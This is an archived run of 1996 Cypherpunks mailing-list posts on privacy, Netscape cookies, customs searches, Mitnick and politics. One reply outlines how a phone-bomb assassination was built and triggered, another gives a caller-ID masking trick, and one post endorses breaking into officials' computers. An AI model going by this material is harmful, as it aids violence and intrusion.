repeatedly demonstrated by media/reporter types (by visiting a number of IRS 
offices, presenting them with the same identical numbers, and asking them 
how much taxes are owed, and each office gives a DIFFERENT amount.  In other
words, even if we ASSUME the existence of some sort of "contract," nobody
seems to be able to agree on what the terms of that "contract" are.

Now, I'm not a lawyer, and I don't even play one on TV, but one thing that I
do know about law is that for there to be a "contract" there is necessary to
be a "meeting of the minds" about what that contract is actually for.  Both
(all?) parties to the contract must have the same UNDERSTANDING of the terms
of the contract in order for it to be valid.  Clearly that is not the case
about the "social contract" statist lunatics speak of.

Furthermore, in order for there to be a valid "contract" there must be
CONSENT.  One party cannot threaten or extort from the other, getting the
other party to agree to terms that are coercive. Both parties must have the
option of NOT entering into that "contract."  Yet, practically the whole
reason for the existence of governments is "coercion," meaning that absent
some clear evidence of arms-length negotiation, it is impossible to come to
a valid "contract" with the government.

Like I said before, you're a fucking statist.

>>  Remember the following words:
>> "Klaatu Burada Nikto."     I'm working on a similar system.  You'll
>> eventually hear of it.
>
>You're building a giant robot? Oh my. I thought this was starting to read 
>like bad science fiction.

Just wait.

I've decided to post this to Cypherpunks.  Forgive me, it's only marginally
on-topic, but I think it's vital for the public to know how Richard Graves
thinks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Tue, 16 Jan 1996 15:12:29 +0800
To: cypherpunks@toad.com
Subject: Re: (none) [httpd finding your identity]
In-Reply-To: <199601150454.VAA00449@wero.cs.byu.edu>
Message-ID: <30FB18FC.5CD9BFF6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein wrote:
> 
> > can do about the reverse-ip, but what about http referral field? Will
> > there be a way to turn off (blank, actually) this field?
> 
>   I would like to add a way to turn it off, but it won't happen in 2.0.

Something that a lot of people don't realize is that the HTTP referrer
field is only sent when you've actually clicked on a link -- it does
not just give away the last page you happened to be looking at, it only
gives away pages that actually refer to the one you're going to.  So if
you're concerned about leaving a trail to a particular page, you can go
there by pasting the URL into the Location field, or via a bookmark
(menu item, not page), etc.

Very, very early betas of Netscape (around 0.6 or so, I think) did give
away whatever the previous page was, and I think old versions of Mosaic
did so as well.

-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a
  black velvet clown painting; it's a rectangle of carets surrounding
  a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
                                                         -- Chris Maeda




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark (Mookie) <mark@zang.com>
Date: Tue, 16 Jan 1996 14:04:31 +0800
To: cypherpunks@toad.com
Subject: Re: The Last Mitnick Post/Thread
Message-ID: <199601160544.TAA08002@zang.com>
MIME-Version: 1.0
Content-Type: text


>Markoff, and Tsutomo acted reprehensibly by quoting sniffer sessions with Kevin
>and jsz in which my site was mentioned.  Not only were the facts wrong

At the time everyone knew Kevin was getting very warm, the simple social
contacts people had with him were becoming insidious due to the increased
attention being put on him. He was becoming rather infatuated with some people
too which some of his antics show. It was in this climate that a process of
alientation began where lies were fed him and procrastination was offered as
a reason for avoiding his spheres and requests. Noone wants to hold the hot
potato.

I'm actually observing similar activities today as someone who has a court
date approaching is becoming alienated by his own actions and the attitudes
of others. Preparing to go to jail was my first thought. Some people never
learn.

>who/what netsys.com/Len Rose is, they only bothered to mention the past and not

What do you expect? They are out for emotive impact, bugger the facts. You
being an internet service provider doesnt sell, but a couple of events in the
past can be made to give everything a dark and dangerous flavour. Pique
interest and generate another percent of sales.

>perhaps someone could clear jsz's name which seems to be pretty muddied by the
>somewhat irresponsible literary excesses which seem to fill the Tsutomo/Markoff

Him and all the others I've heard bandied about. It's a case of tall poppy
syndrome where anyone who has a brain is pushed into a higher status than
they want or deserve. I've seen a number of people recently who have been
spoken of in vaulted tones or thought of as bleeding edge merely because
they have had exposure to a lot of systems and their skill set is more
than passable. I think jsz's name was mentioned because it was the only
intelligent converstion Shimomura actually got. Mitnik was always warezing
and trading around and doing the 3133+ $p34K crap so prevalent today. I
found him boorish and didn't pay much attention to him. It was only when
this Shimomura crap started anyone cared who he spoke to.

I regard the whole sordid deal as a hollywood driven sales and marketing
machine, most likely coached to the two players by their media backers.
When they stop trying to make things into something they aren't is when
I'll bother to pay any attention to their ravings.

nuff said.
Mark




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 16 Jan 1996 13:45:35 +0800
To: John Young <jya@pipeline.com>
Subject: Re: CelBomb
In-Reply-To: <199601061349.IAA11236@pipe4.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.960115200633.18120B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 6 Jan 1996, John Young wrote:

>    Can anyone in IL, or elsewhere, report more on the head-job
>    of The Engineer:
> 
>    Any crypto used to authenticate the target for the boombox,
>    or to obscure links to the assassin?

No.  It was not assumed that the victim would take special notice of the 
phone call, or certainly not enough to bother to try and track the signal 
realtime BEFORE accepting the phone.  Hence, crypto is serious overkill.

> 
>    How was the blast specifically targeted at him and not a
>    phone borrower?

The phone was given to a trusted traitor, a call comes in, trusted agent 
tells hapless victim that he should talk to this person, caller 
estlablishes that this is the target by voice or otherwise, then hits 
e.g., the pound key, which triggers the explosive concealed in the battery.

The charge was shaped to deliver the most available force into the ear.  
Not much explosive is required for such an application.

>    How it was set off -- by user-dialing, remote control, some
>    other means?

DTMF dialing.  It may also have been a special frequency not available 
from the keypad, but I don't believe so.

>    Any fishy smelling brand names to immediately run from?

Whatever is being used.  The installation was a totally custom job, and 
incidently, quite simple in implementation.  Never take anything from 
others without close scrutiny if you are this wanted.

Such devices on normal phones are common methods.  Moving them to keep up 
with technology is a simple matter.

>    Answers urgent.

Uh huh.  Sure.

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 16 Jan 1996 14:37:59 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: [NOISE] Re: Eggs at Customs (fwd)
In-Reply-To: <Pine.SV4.3.91.960115222834.3397C-100000@larry.infi.net>
Message-ID: <Pine.ULT.3.91.960115193628.29666Y-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jan 1996, Alan Horowitz wrote:

> Well, who is a non-native?   If it walked across the Bering Sea land 
> bridge a few thousand years ago, does it have a higher moral value than 
> if it hopped a ride on the bilges of a cargo ship in 1957?

Morality has nothing to do with it. It's the speed of the evolution. If
you walk across the straits, the system has the time to react and restore
a dynamic equilibrium. If you immediately release a new species with no
natural predators, the system is shattered, and it might not survive. 
This is not to say that ecosystems and societies are static -- they evolve
constantly, displaying unpredictable punctuated equilibrium (Steven J.
Gould was right, Edmund Burke and Karl Marx were wrong).

Usually, the mutations (in biology or politics) are minor, and almost
always, they are localized.

Large-scale catastrophes like a meteor hitting the earth and killing all
the dinosours (or whatever happened), or nuclear war, or whatever, are
larger punctuation than normal. Sometimes the ecosystem recovers,
sometimes a completely new ecosystem forms, sometimes all life but the
cockroaches is wiped out. 

Politically and morally, I'm a follower of the realist school (Morgenthau
et al). It is right for the US to dominate the world because it has the
most power. On the level of international relations, it doesn't matter how
it got that way; trying to reverse the power realities would be like
trying to dam the Pacific Ocean. Of course, in specific cases in the
present, we can make moral choices, and if we feel like it, we can help
out the present victims of historical "immorality" (like the fact that the
descendants of slaves weren't born into the same inheritance as the
descendants of the Carnegies and Vanderbilts). 

> If you want to isolate the rainforest until mankind has had time to 
> completely inventory all the species and test them to see if they are the 
> next cure for malaria or an exploitable raw material, well, now you have 
> my sympathy.

Sympathy is the wrong emotion for both politics and science, but then,
what you're talking about isn't sympathy. 

Cute cuddly seals and frieldly dolphins and teddy bears get "sympathy"
among mainstrean "environmentalists," and the Sierra Club and World
Wildlife Federation calendars raise a lot of money, but it's the plants
and bugs and bacteria that are really important. Elephants and blue whales
look big and important to us, but they're really inconsequential in the
larger scheme of biodiversity. They could go extinct and the planet
doesn't really care. But kill the blue-green algae and the trees, and
we're all dead. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 16 Jan 1996 12:17:59 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Crypto anarchist getting through customs
Message-ID: <ad205fc806021004b0a0@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:27 AM 1/16/96, Alan Horowitz wrote:
>My bullshit detector is starting to pin the needle.
>
>US Customs doesn't care about your political status or leanings.
>They want to collect the proper excise and catch contraband.
>
>There are INS people at passport control.   I am skeptical that they
>would detain a US passport holder for 36 hours. I would like to see some
>evidence that this actually happened.
>
>US citizens can't be excluded from the country, nor have their
>citizenship taken away from them.

Since you're addressing this to me, what exactly did I say--be
specific--that you think I was bullshitting about?


They can, and do, detain entering citizens, as the Zimmermann case showed.
And our own Fred Cohen confirms that he was detained upon re-entering the
U.S. from Canada.

--Tim May


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gbe@primenet.com (Gary Edstrom)
Date: Wed, 17 Jan 1996 07:56:35 +0800
To: cypherpunks@toad.com
Subject: Novell & Microsoft Settle Largest BBS Piracy Case Ever
Message-ID: <30fac193.340341789@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


I saw this in a news summary today and thought that it might be of
interest to the list.  Sorry, but this is all of the article that I
have.

>From PR Newswire:

"Microsoft Corporation and Novell, Inc. Jointly announced today they
have reached a settlement with Scott W. Morris, who was doing business
as the Assassins Guild Bulletin Board Service, in what is belived to
be the largest settlement ever..."

--
Gary Edstrom <gbe@primenet.com> | Sequoia Software
PO Box 9573                     | Programming & Technical Services
Glendale CA 91226-0573          | PGP Key ID: 0x1A0D44BD
PGP Fingerprint: 72 AA 4F 73 05 53 89 C6  8A EE F4 EE D1 C0 13 8D 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 16 Jan 1996 14:03:26 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Respect for privacy != Re: exposure=deterence?
In-Reply-To: <199601152213.RAA19247@universe.digex.net>
Message-ID: <Pine.ULT.3.91.960115213302.29666h-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jan 1996, Scott Brickner wrote:

> s1018954@aix2.uottawa.ca writes:
> >My apologies for responding to a political post.
> >
> >On Sat, 13 Jan 1996, Charlie Merritt wrote:
> >
> >> I feel that public exposure
> >> is enough to put fear into these anonymous government employees.
> >> You will note that when they get the mad_bomber
> >> some FBI guy jumps right up and takes credit, live, on TV.
> >> But when the Air Force orders a $300 toilet seat NO ONE is credited.
> >
> >It's interesting how we advocate anonymity for ourselves but not for our
> >opponents. Feeling righteous?
> 
> I agree with Charlie.  These government employees claim to be working
> for the american taxpayers, of which group I am a member.  Government
> agents must, therefore, expect to be accountable to the citizens, while
> accountability in the other direction is virtually the definition of
> tyranny.

Absitively.

But government employees should only be held accountable for their actions
as government employees. If the situation warrants, go ahead and tap their
offices, break into their work computers, etc. But don't fuck with their 
personal lives.

Lots of people on this list have the power to carry out their own tyranny
over both individuals and groups. All it takes in today's fragile online
world is a little specialized knowledge. I don't think it's ethical to use
this power without serious thought. 

The line between government and non-government is increasingly blurry
anyway. Everybody gets something from the government, be it roads or an
education. Why should you be more suspicious of the guy getting paid
$10/hour to deliver your mail by the government than the private
businessman getting millions of dollars in government subsidies? 

I think we're fundamentally asking the wrong question. I only see relative
power. I'd estimate that Bill Gates is more powerful than Fidel Castro in
many respects. He's certainly a lot more powerful than your average postal
clerk. 

-rich
 P.S. For the Good of the Order, I'm temporarily ignoring jimbell




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Date: Wed, 17 Jan 1996 23:54:11 +0800
To: cypherpunks@toad.com
Subject: Information Sent by Netscape during Queries
Message-ID: <v01530503ad20cfd1d938@[199.184.183.25]>
MIME-Version: 1.0
Content-Type: text/plain


Here's some questions I hope some of the Netscape staffers on the list can
help with.

1) Can we delete/rename or otherwise disable the MagicCookie file and still
   use Navigator?

2) Are there headers besides the standard HTTP/1.0 fields sent with our
   http transactions? What are they?

3) Can we go completely stealth inside of Netscape without a proxy server?

In a privacy seeking frame of mind,

Bill


Bill Humphries \/\/\/ bill.humphries@msn.fullfeed.com /\/\/\ Madison, WI, USA
PGP Public Key Fingerprint = 84 05 17 9D B9 6E 2D FE  A7 D1 E0 DC D0 96 63
FB






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremy Mineweaser <jeremym@area1s220.residence.gatech.edu>
Date: Tue, 16 Jan 1996 17:32:14 +0800
To: cypherpunks@toad.com
Subject: Re: Reach out! Update 01  (CypherPurists trash this)
Message-ID: <9601160313.AA22027@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:10 AM 1/13/96 EST, Dan Bailey wrote:

>Regarding the *67 feature to disable Caller ID:
>This does not stop your ANI information from travelling
>with your call.

>A *much* better way to do this is the following:
>Dial the Operator.
>Ask him/her to dial the 800 number for you.
>
>This will result in your ANI being (000) 000-5555
>I tested this a couple months
>ago using AT&T's 1-800-MY-ANI-IS service.  I directly dialed
>1-800-MY-ANI-IS and it read back my phone number.  Then I had 
>the operator dial it for me and got (000) 000-5555.  This 
>service doesn't work anymore, YMMV.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Tue, 16 Jan 1996 17:30:12 +0800
To: grimm@MIT.EDU
Subject: Re: Bignum support in C++
In-Reply-To: <9601151916.AA00949@w20-575-119.MIT.EDU>
Message-ID: <199601160319.WAA02872@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Actually, Wei Dai's Crypto++ library contains a fairly good BigNum
package (actually, the MPI code from PGP 2.6.2, I believe ;) wrapped
in C++.

So, there is no need to do any work, just grab Wei's library and use
the bignums out of there.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 16 Jan 1996 14:31:48 +0800
To: cypherpunks@toad.com
Subject: Need confirmation of Win95 password encryption back door
Message-ID: <Pine.ULT.3.91.960115214612.29666i-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

A Major Media Outlet requires confirmation that Windows 95, to facilitate
its automatic reconnect feature for sleeping laptops and temporary network
outages, caches all network passwords (NetWare, NT, UNIX running Samba,
SLIP/PPP dialup) in unprotected memory in clear text, whether you've
disabled persistent "password caching" to disk and applied the December
14th 128-bit RC4 .PWL patch, or not. There seems to be no way to turn 
this off.

The idea, of course, is that a simple trojan horse could do whatever it 
wanted with this information.

We know that this vulnerability exists in Windows for Workgroups, and
Peter wrote a little demo (on hackmsoft page below, without source), but
the APIs appear to have changed in Win95. 

So, anyone have Win95 and some time to kill, or can anyone recommend a
good DOS/Windows RAM grepper? 

- -rich@c2.org
 http://www.c2.org/hacknmsoft/

 $ Mon Jan 15 22:17:10 PST 1996 $
 $ From llurch@networking.stanford.edu to cypherpunks@toad.com $

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPtDLo3DXUbM57SdAQEN7QP+J6Gmk6m8dv3X96SKZciI/L7DM04bDSoi
HZa+dIoajAiRrfG9oSNcIYbVDDs67qwCSKGFg9hc5K3x99nhbq3Aw2mio62YQj+2
K62pBT9hQLe4dv8AMhLtIqyG4ZztYy+dDjGzsaUIkBUZKo5//Eh8c81xXLQrqXtk
RFV+xkXBgww=
=12rk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Wed, 17 Jan 1996 03:55:50 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <ad1ff257040210044402@[205.199.118.202]>
Message-ID: <Pine.SV4.3.91.960115221608.3397A@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


My bullshit detector is starting to pin the needle.

US Customs doesn't care about your political status or leanings. 
They want to collect the proper excise and catch contraband.

There are INS people at passport control.   I am skeptical that they 
would detain a US passport holder for 36 hours. I would like to see some 
evidence that this actually happened.

US citizens can't be excluded from the country, nor have their 
citizenship taken away from them.


Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 16 Jan 1996 12:15:41 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Novell & Microsoft Settle Largest BBS Piracy Case Ever
In-Reply-To: <199601152123.QAA28777@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.960115223141.25666A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jan 1996, Perry E. Metzger wrote:

> Gary Edstrom writes:
> > I saw this in a news summary today and thought that it might be of
> > interest to the list.  Sorry, but this is all of the article that I
> > have.
> 
> Repeat after me:
> 
> This is not software piracy punks. This is CYPHERpunks. We talk about
> cryptography and its implications on society. Software piracy isn't a
> topic around here.

Except, of course, if truly anonymous transactions were easily available 
now, the people wouldn't have gotten caught AND could have made a bundle 
in the process...

End of goverments = decline (but not end) of software markets?

Jon Lasser
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 16 Jan 1996 12:00:49 +0800
To: Rich Graves <llurch@networking.stanford.edu>
Subject: Re: Eggs at Customs (fwd)
In-Reply-To: <Pine.ULT.3.91.960115180719.29666U-100000@Networking.Stanford.EDU>
Message-ID: <Pine.SV4.3.91.960115222834.3397C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


Well, who is a non-native?   If it walked across the Bering Sea land 
bridge a few thousand years ago, does it have a higher moral value than 
if it hopped a ride on the bilges of a cargo ship in 1957?

If you want to isolate the rainforest until mankind has had time to 
completely inventory all the species and test them to see if they are the 
next cure for malaria or an exploitable raw material, well, now you have 
my sympathy.


Alan Horowitz
alanh@norfolk.infi.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 16 Jan 1996 17:14:34 +0800
To: Bill Humphries <Bill.Humphries@msn.fullfeed.com>
Subject: Re: Information Sent by Netscape during Queries
In-Reply-To: <v01530503ad20cfd1d938@[199.184.183.25]>
Message-ID: <30FB47ED.416B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Humphries wrote:
> 
> Here's some questions I hope some of the Netscape staffers on the list can
> help with.
> 
> 1) Can we delete/rename or otherwise disable the MagicCookie file and still
>    use Navigator?

  Is your attempt to disable cookies all together or just disable
persistent (last across multiple sessions) cookies?  If you want
to disable persistent cookies and you are running on unix you can
just chmod the cookies file to be un-writable.  I don't believe that
there is a way to disable cookies in general.

> 2) Are there headers besides the standard HTTP/1.0 fields sent with our
>    http transactions? What are they?

  We send headers for proxies, caching, fetching byte ranges, and
cookies.  Some of these are part of HTTP 1.0 or extensions that
are being worked on in IETF or W3C working groups.

> 3) Can we go completely stealth inside of Netscape without a proxy server?

  No.  Right now you can't disable cookies, you can't disable
referer, and you can't mask your IP address.  I'd like to add
an option to disable everything that we can in some future
release, but there is nothing I can do about the IP address.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Tue, 16 Jan 1996 12:31:54 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Respect for privacy != Re: exposure=deterence?
In-Reply-To: <199601152213.RAA19247@universe.digex.net>
Message-ID: <Pine.3.89.9601152127.D64778-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain


*Overlong and badly edited argument in underhanded support of government
anonymity follows, it gets better towards the end, feel free to skim*

On Mon, 15 Jan 1996, Scott Brickner wrote:

> s1018954@aix2.uottawa.ca writes:
> >My apologies for responding to a political post.
Here I go again.

> I agree with Charlie.  These government employees claim to be working
> for the american taxpayers, of which group I am a member.  Government
> agents must, therefore, expect to be accountable to the citizens, while
> accountability in the other direction is virtually the definition of
> tyranny.

I mostly agree with that argument on even days and mostly disagree with it
on odd ones. The way I see it mostly depends on whether or not you believe
in organizational thermodynamics ("the center cannot hold, entropy 
increases...") and positive and practical uses of absolute freedom of speech 
(and by extension the anonymity to keep it that way).

Should government employees be "allowed" to have access to the package deal
of anonymity (and money laundering) that we are pushing?

  First you should check whether or not they already do and in what form it 
comes. As we've seen in (among many other things) the persecution of Phil Z.,
there definitely are the proverbial nameless bureaucrats. Is this not 
anonymity?
 
  FOIA filings or suits cost money, time and sanity. While you can get 
the odd tidbit out of this method, it is not for the faint-hearted and 
will not get you anything that the government wants to keep classified 
(except in the really odd case that it was temporarily unclassified by 
accident).

  If government accountability is to be based upon this disclosure method,
then it is on very shaky footing. This is anonymity, not the overt and freely
usable anonymity of the cypherpunk style, but covert anonymity, that which
is exists for an entrenched institution while giving the public impression
of not being there and justifying inadequate measures like the FOIA.
This is a form of organizational stegonography, I guess.

 Consider on the other hand if a large part of the govermental communications
infrastructure, let's say email and groupware were conducted through a 
remailernet or somesuch cpunk-style anonymizing scheme. Would bureaucratic 
secrecy get any worse? Since I am neither an active activist nor a journalist, 
I cannot say. 

  I do know that besides the natural desire of the spook agencies
to work this way, many businesses have often claimed that there are 
pruductivity advantages to anonymous offices communications and boardroom 
meetings. They tend to generate creative ideas and encourage honesty and 
outspokenness by those lower on the pecking order. So there are legitimate
business uses for it. The more legitimate the concept becomes, the more
people get used to it and start thinking about the advantages and the 
implications of not using True Names. (I realize this has been said before,
bide with me.) Think of it as grass-roots crypto vs. institutional stego.

  Legitimacy, publicity and widespread use are one thing, giving it to 
government is another. The argument is that if we legitimize privacy for 
the gov, that's the end of democracy. IMO, if you sell people on the illusion
of fourth estate power to verify gov action and render them accountable, 
you are living in an even more dangerous form of self-denial and willful 
ignorance. So far so good, nothing new. But what if there are actual benefits
to be had? If cypherpunks have some latent desire to speak freely, maybe 
this is a natural tendency for everyone else too. 

  Ottawa is the bureaucratic capital of this country. In my short stay 
here, the most vehement opposition to the bureaucracy and red tape I 
have heard has been from the fed-up bureaucrats themselves. 
They are the poor saps who must deal with this stupidity and waste day-in 
day-out. I assume the military and the spooks have it the worst (and I 
have heard them say just that). AFAIK this is our best constituency. Notice
that Tim, of all people, is from a government town.

  Journalists frequently get anonymous tips, the gov even occasionally pays
lip-service to setting up an anonymous whistleblowers BBS. How were books
like The Puzzle Palace written if not with inside help and off-the-record
interviews. Need I mention the Pentagon Papers? Anonymity is something the 
government (the organization) craves, yet allowing its employees to use
the anonymity we as cypherpunks want could be the most underhanded 
present possible. Not only does it entrench it (if the entire government has 
it, how could they ban it?) but allows individuals within it to pass on the 
info they please without fear of persecution. If we are ever to get, 
let's say, the Skipjack algorithm, this scenario is much more likely than
reverse-engineering of Clipper. This has many implications. Anonymous
government employees are IMHO a far more effective check on power than
a disinterested easy-profit oriented mainstream press and overstretched 
civil liberties lobbies. 

 Think of it as one organization with 3 million potential unions. Can anyone 
imagine what would have happenned if even one of the pilots during the 
Gulf War had been able to anonymously post a video of the carpet-bombing 
of Iraq or any other contradiction of official reporting? No journalist 
could have done this.

 The decentralizing, entropic power of masses of thinking individuals has
more power than centralized paper-shuffling court-martialing rule. The 
gov is already out of control, maybe it will go out of control in a different 
direction once the technology of free speech permits it.

 There is also very little we can do to stop anyone from using it. As Louis 
Freeh has discovered, once the technological genie is out of the bottle, it 
stays out. Should I be wrong about these positive implications, once the
code written, just as the inventors of nukes turned pacifist, the authors
of crypto software will have no control over their creation. Giving to the
public amounts to giving it to the gov. I simply prefer that it be overt 
rather than covert.

 I will not even go into the positively underhanded benefits of giving 
the gov anon digicash. The issues are the same, but even moreso. Three cheers
for capitalism.


 









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Tue, 16 Jan 1996 16:00:55 +0800
To: "'cpunks'" <cypherpunks@toad.com>
Subject: FW: Net Control is Thought Control
Message-ID: <01BAE3A0.1232C6A0@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From:    Vladimir Z. Nuri@LD.com

I don't understand your point. both the agent provocateur and "victim"
are crucial to the process of brainwashing. they are the yin and yang
of it all, of course, and I am certainly not arguing otherwise. what
I was pointing out was that it is increasingly difficult to identify
people's secret agenda in cyberspace. 
..............................................................................................

"What distinguishes coercive persuasion from other kinds of influence processes is the degree to which the person who is to be influenced is physically or psychologically confined to a situation in which he must continue to expose himself to unfreezing pressures.   Not only did the prison confine him physically, but the round-the-clock vigilance and pressure from cellmates confined the person psychologically to an environment in which unusually intense unfreezing pressures were present at all times...."  (from the book)

Now, you know that no one either on this list or anywhere in cyberspace is confined, either physically or psychologically, to continuously & unwillingly expose themselves to alt.usenet.kooks or http://www.ho-hum.com or cypherpunks, etc..  If they continue to do so it is because they themselves have put themselves there or have not seen fit to leave when it behooved them (sometimes requiring the use of kill files to avoid them).

A person in an unrestricted setting, who is so easily persuaded by others that they cannot resist being influenced, has a lot of work to do in finding out about their own lack of self-confidence & direction.   A "victim of information" must study & discover the difference between valid info & dangerous nonsense.  There are ways to know when someone is trying to supplant one's own initiative with their own preferences.  

And here's plenty of debate & unrestricted flaming in cyberspace to challenge anyone's passive acceptance of another's conclusions (or of their own unexamined presumptions).  And there's always new software tools to enable participants to make a quick exit if they feel uncomfortable with a conversation.
 
"the next time you see a flamewar, ask yourself this question: what would
I think if I found out every opinion and post on one side  was manufactured
by a single person? how can you be so sure they aren't?"

Unless I was thinking of going out to lunch with one of them, I can't see why I would care.  i.e.,  unless I needed to make a decision for action based on what they had said, it wouldn't really matter to me.  I expect I would have more effect on them than vice-versa.  :>)
    ..
Blanc









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 16 Jan 1996 13:50:53 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Crypto anarchist getting through customs
In-Reply-To: <ad1ff257040210044402@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.960115234721.21412B-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jan 1996, Timothy C. May wrote:

> YCO: " 'Cryptography'? "  (A look of no comprehension.)
> 
> Me: "Yes, cryptography. You know, secret codes, ciphers, stuff like that."
> 
> YCO: "Were there any foreigners present?"
> 
> Me: "Yes, it was in Monte Carlo. There were some Russians there, and lots
> of others."
> 
> YCO: [brief pause] "Did you bring anything back with you?"
> 
> Me: "No."
> 
> YCO: [waved me through]
>
	You were lucky. had the YCO understood the implications of 
    crypto, he probably would not have been so genial.

	San Fransisco is a good entry port for that reason --it does not 
    seem to be a major drug entry point via commercial airlines.  
    Secondly, the four or five times I have gone through there have been 
    hi-bye even though I am flagged --however, carrying a foreign service 
    passport (which has no relation to immunity) requires them to manually 
    enter the number...  end of story in loose ports.

> 
> In my carry-on luggage I had half a dozen magneto-optical disks, carring
> about a gigabyte of stuff. (As props to use during my talk on the
> France/Monte Carlo side, ironically, to show that borders are fully
> transparent.)
> 
	For the record, I have _never_ imported or exported anything 
    relevant as my own courier; there are far too many easy ways...
 
> 
> Frequent travellers to Europe will no doubt confirm what I'm saying. I
> travelled to dozens of countries in Europe a while back, and never was
> checked at any borders, save for a quick glance at my passport.
> 
> --Tim May
> 
	For the most part that is very true.  The only places I ever get 
    hassled is at obscure German-Swiss borders at night (driving). 
    Usually an older officer stuck with nights to encourage resignation
    --breeds a foul temper and absolute lack of humour --not that the
    Swiss ever had one <g) --I can say that with impunity: I am Swiss. 

	Other than bombs, the Europeans are just not cynically paranoid.

> "National borders aren't even speed bumps on the information superhighway."
> 
	yup, there's always high bandwidth spread spectrum in a truck.

		attila
__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 17 Jan 1996 16:00:46 +0800
To: cypherpunks@toad.com
Subject: Cybercrime & Privacy Issues AOL FBI discussion
Message-ID: <2.2.32.19960116080509.009d98fc@mail.teleport.com>
MIME-Version: 1.0
